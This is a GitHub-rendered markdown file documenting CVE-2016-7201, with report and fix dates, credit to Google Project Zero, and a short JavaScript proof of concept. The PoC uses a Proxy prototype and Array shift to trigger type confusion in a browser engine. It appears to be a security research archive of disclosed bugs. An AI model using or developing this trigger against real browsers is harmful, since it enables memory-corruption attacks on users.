Skip to content

Latest commit

 

History

History
33 lines (24 loc) · 833 Bytes

CVE-2016-7201.md

File metadata and controls

33 lines (24 loc) · 833 Bytes
Raw

CVE-2016-7201

  • Report: Sep 2016
  • Fix: Nov 2016
  • Credit: Natalie Silvanovich, Google Project Zero

PoC

var a = new Array(0x11111111, 0x22222222, 0x33333333, 0x44444444, 0x12121212, 0x23232323, 0x12345670, 0x7777);

var handler = {
    getPrototypeOf: function(target, name){
	return a;
    }
};

var p = new Proxy([], handler);
var b = [{}, [], "natalie"];

b.__proto__ = p;
b.length = 4;

a.shift.call(b);
// b[2] is type confused

Refernece